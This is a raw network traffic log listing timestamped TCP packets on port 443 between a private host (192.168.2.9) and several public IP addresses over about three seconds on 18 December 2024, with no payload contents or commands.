Dec 18, 2024 21:09:30.703736067 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.703824043 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.703835964 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.711182117 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.711231947 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.711239100 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.718496084 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.718548059 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.718554020 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.726007938 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.726059914 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.726068020 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.733521938 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.733602047 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.733608961 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.741007090 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.741091967 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.741101980 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.748231888 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.752197981 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.752206087 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.755790949 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.755887032 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.755892992 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.767417908 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.768136978 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.768153906 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.770790100 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.771050930 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.771063089 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.778134108 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.778187990 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.778198004 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.785670996 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.785753012 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.785763979 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.793098927 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.795370102 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.795378923 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.800570965 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.800632000 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.800646067 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.807984114 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.808094978 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.808108091 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.820497036 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.820605040 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.820621967 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.827743053 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.827795982 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.827806950 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.839643955 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.839843035 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.839852095 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.840946913 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.840992928 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.841002941 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.844846010 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.844896078 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.844904900 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.851824999 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.851886034 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.851893902 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.859348059 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.859404087 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.859416962 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.876245022 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.876328945 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.876358032 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.876374006 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.876430035 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.877409935 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.880120993 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.880171061 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.880182028 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.882374048 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.882430077 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.882441998 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.888458967 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.888518095 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.888533115 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.891027927 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.891084909 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.891093969 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.895838976 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.895899057 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.895905972 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.900310993 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.900367022 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.900372982 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.904901981 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.904988050 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.904995918 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.905877113 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:30.905967951 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.906092882 CET	49761	443	192.168.2.9	142.250.181.65
Dec 18, 2024 21:09:30.906110048 CET	443	49761	142.250.181.65	192.168.2.9
Dec 18, 2024 21:09:31.139395952 CET	443	49773	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:31.139885902 CET	49773	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:31.139900923 CET	443	49773	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:31.140227079 CET	443	49777	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:31.140971899 CET	443	49773	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:31.141345024 CET	49777	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:31.141345024 CET	49773	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:31.141359091 CET	443	49777	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:31.142230034 CET	49773	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:31.142297983 CET	443	49773	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:31.142383099 CET	49773	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:31.142533064 CET	443	49777	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:31.142829895 CET	49777	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:31.142978907 CET	443	49778	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:31.143132925 CET	49778	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:31.143143892 CET	443	49778	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:31.144052982 CET	49777	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:31.144143105 CET	443	49777	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:31.144715071 CET	443	49778	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:31.144776106 CET	49778	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:31.145766020 CET	49778	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:31.145894051 CET	443	49778	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:31.145944118 CET	49778	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:31.145951033 CET	443	49778	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:31.146547079 CET	49777	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:31.146558046 CET	443	49777	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:31.168667078 CET	443	49780	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:31.168876886 CET	49780	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:31.168909073 CET	443	49780	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:31.170078993 CET	443	49780	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:31.170145035 CET	49780	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:31.170614958 CET	49780	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:31.170614958 CET	49780	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:31.170676947 CET	443	49780	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:31.175230980 CET	49799	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:31.175293922 CET	443	49799	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:31.175369978 CET	49799	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:31.175544024 CET	49799	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:31.175563097 CET	443	49799	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:31.183346987 CET	443	49773	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:31.190116882 CET	49773	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:31.190135002 CET	443	49773	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:31.212903976 CET	443	49781	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:31.213171005 CET	49781	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:31.213184118 CET	443	49781	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:31.214236021 CET	443	49781	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:31.214303017 CET	49781	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:31.214714050 CET	49781	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:31.214798927 CET	443	49781	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:31.214936972 CET	49781	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:31.214945078 CET	443	49781	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:31.220778942 CET	49778	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:31.220838070 CET	49777	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:31.220838070 CET	49780	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:31.220863104 CET	443	49780	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:31.236099005 CET	49773	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:31.252919912 CET	49800	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:31.252969027 CET	443	49800	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:31.253079891 CET	49800	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:31.253310919 CET	49800	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:31.253329039 CET	443	49800	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:31.265872002 CET	443	49782	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:31.266192913 CET	49782	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:31.266206026 CET	443	49782	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:31.267271996 CET	443	49782	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:31.267368078 CET	49782	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:31.268918991 CET	49782	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:31.268986940 CET	443	49782	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:31.269165993 CET	49782	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:31.311332941 CET	443	49782	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:31.321892977 CET	49801	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:31.321954966 CET	443	49801	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:31.322020054 CET	49801	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:31.322529078 CET	49801	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:31.322545052 CET	443	49801	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:31.408267975 CET	49781	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:31.408287048 CET	49782	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:31.408307076 CET	443	49782	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:31.408318043 CET	49780	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:31.503938913 CET	49802	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:31.503994942 CET	443	49802	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:31.504139900 CET	49802	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:31.504373074 CET	49802	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:31.504388094 CET	443	49802	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:31.517596006 CET	49782	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:31.575284958 CET	443	49773	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:31.575418949 CET	443	49773	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:31.575514078 CET	49773	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:31.575864077 CET	49773	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:31.575881004 CET	443	49773	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:31.576227903 CET	443	49777	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:31.576291084 CET	443	49777	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:31.576426029 CET	49777	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:31.576550007 CET	49777	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:31.576554060 CET	443	49777	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:31.578151941 CET	443	49778	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:31.578219891 CET	443	49778	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:31.578318119 CET	49778	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:31.578516006 CET	49778	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:31.578532934 CET	443	49778	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:31.605372906 CET	443	49780	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:31.605478048 CET	443	49780	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:31.605987072 CET	49780	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:31.605987072 CET	49780	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:31.629518986 CET	443	49796	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:31.629600048 CET	49796	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:31.630141973 CET	49796	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:31.630150080 CET	443	49796	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:31.637391090 CET	49796	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:31.637398005 CET	443	49796	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:31.637463093 CET	49796	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:31.637470961 CET	443	49796	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:31.648011923 CET	443	49781	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:31.648094893 CET	443	49781	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:31.648309946 CET	49781	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:31.648418903 CET	49781	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:31.648444891 CET	443	49781	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:31.700918913 CET	443	49782	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:31.701000929 CET	443	49782	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:31.701201916 CET	49782	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:31.701282024 CET	49782	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:31.701299906 CET	443	49782	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:31.909060001 CET	49780	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:31.909110069 CET	443	49780	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:32.012700081 CET	443	49792	18.165.220.57	192.168.2.9
Dec 18, 2024 21:09:32.016458035 CET	49792	443	192.168.2.9	18.165.220.57
Dec 18, 2024 21:09:32.016489029 CET	443	49792	18.165.220.57	192.168.2.9
Dec 18, 2024 21:09:32.017831087 CET	443	49792	18.165.220.57	192.168.2.9
Dec 18, 2024 21:09:32.017893076 CET	49792	443	192.168.2.9	18.165.220.57
Dec 18, 2024 21:09:32.021050930 CET	49792	443	192.168.2.9	18.165.220.57
Dec 18, 2024 21:09:32.021147013 CET	443	49792	18.165.220.57	192.168.2.9
Dec 18, 2024 21:09:32.065882921 CET	49792	443	192.168.2.9	18.165.220.57
Dec 18, 2024 21:09:32.065911055 CET	443	49792	18.165.220.57	192.168.2.9
Dec 18, 2024 21:09:32.112024069 CET	49792	443	192.168.2.9	18.165.220.57
Dec 18, 2024 21:09:32.139374018 CET	49803	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:32.139422894 CET	443	49803	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:32.139494896 CET	49803	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:32.139657974 CET	49804	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:32.139713049 CET	443	49804	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:32.139805079 CET	49803	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:32.139813900 CET	443	49803	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:32.139841080 CET	49804	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:32.140429020 CET	49804	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:32.140440941 CET	443	49804	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:32.395900965 CET	443	49799	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:32.396126032 CET	49799	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:32.396142960 CET	443	49799	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:32.396528959 CET	443	49799	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:32.396853924 CET	49799	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:32.396914959 CET	443	49799	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:32.397026062 CET	49799	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:32.439332962 CET	443	49799	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:32.440257072 CET	49799	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:32.481329918 CET	443	49800	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:32.481585979 CET	49800	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:32.481601000 CET	443	49800	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:32.481936932 CET	443	49800	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:32.482692003 CET	49800	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:32.482692003 CET	49800	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:32.482743979 CET	443	49800	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:32.680125952 CET	443	49796	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:32.680200100 CET	443	49796	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:32.680229902 CET	49796	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:32.680253029 CET	49796	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:32.681092024 CET	49796	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:32.681107044 CET	443	49796	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:32.687335968 CET	443	49800	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:32.687550068 CET	49800	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:32.716931105 CET	443	49802	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:32.717258930 CET	49802	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:32.717272997 CET	443	49802	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:32.717667103 CET	443	49802	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:32.718075037 CET	49802	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:32.718156099 CET	443	49802	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:32.719352961 CET	49802	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:32.729535103 CET	443	49801	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:32.729651928 CET	49801	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:32.731947899 CET	49805	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:32.731981993 CET	443	49805	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:32.732192039 CET	49805	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:32.732460976 CET	49806	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:32.732491970 CET	443	49806	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:32.732538939 CET	49806	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:32.732670069 CET	49805	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:32.732686996 CET	443	49805	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:32.732796907 CET	49806	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:32.732806921 CET	443	49806	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:32.733335018 CET	49801	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:32.733339071 CET	443	49801	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:32.735177994 CET	49801	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:32.735183001 CET	443	49801	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:32.735491991 CET	49801	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:32.735502005 CET	443	49801	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:32.735867023 CET	49801	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:32.735878944 CET	443	49801	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:32.735979080 CET	49801	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:32.736072063 CET	443	49801	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:32.736141920 CET	49801	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:32.736146927 CET	443	49801	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:32.737230062 CET	49801	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:32.737237930 CET	443	49801	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:32.737339973 CET	49801	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:32.737346888 CET	443	49801	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:32.737426043 CET	49801	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:32.737432003 CET	443	49801	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:32.737469912 CET	49801	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:32.737477064 CET	443	49801	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:32.737488985 CET	49801	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:32.737494946 CET	443	49801	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:32.737570047 CET	49801	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:32.737580061 CET	443	49801	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:32.737586021 CET	49801	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:32.737591028 CET	443	49801	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:32.737601995 CET	49801	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:32.737608910 CET	443	49801	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:32.737632036 CET	49801	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:32.737638950 CET	443	49801	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:32.763324022 CET	443	49802	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:32.845109940 CET	443	49799	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:32.845196962 CET	443	49799	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:32.845268011 CET	49799	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:32.845613956 CET	49799	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:32.845628023 CET	443	49799	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:32.908890963 CET	49802	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:32.918463945 CET	443	49800	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:32.918540001 CET	443	49800	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:32.918719053 CET	49800	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:32.918719053 CET	49800	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:33.178703070 CET	443	49802	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:33.178797960 CET	443	49802	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:33.180172920 CET	49802	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:33.183291912 CET	49802	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:33.183320045 CET	443	49802	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:33.315676928 CET	49800	443	192.168.2.9	162.159.61.3
Dec 18, 2024 21:09:33.315706968 CET	443	49800	162.159.61.3	192.168.2.9
Dec 18, 2024 21:09:33.348541021 CET	49809	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:33.348582983 CET	443	49809	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:33.348845005 CET	49809	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:33.349164009 CET	49809	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:33.349178076 CET	443	49809	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:33.369292974 CET	443	49803	172.64.41.3	192.168.2.9
Dec 18, 2024 21:09:33.370495081 CET	49803	443	192.168.2.9	172.64.41.3
Dec 18, 2024 21:09:33.370513916 CET	443	49803	172.64.41.3	192.168.2.9
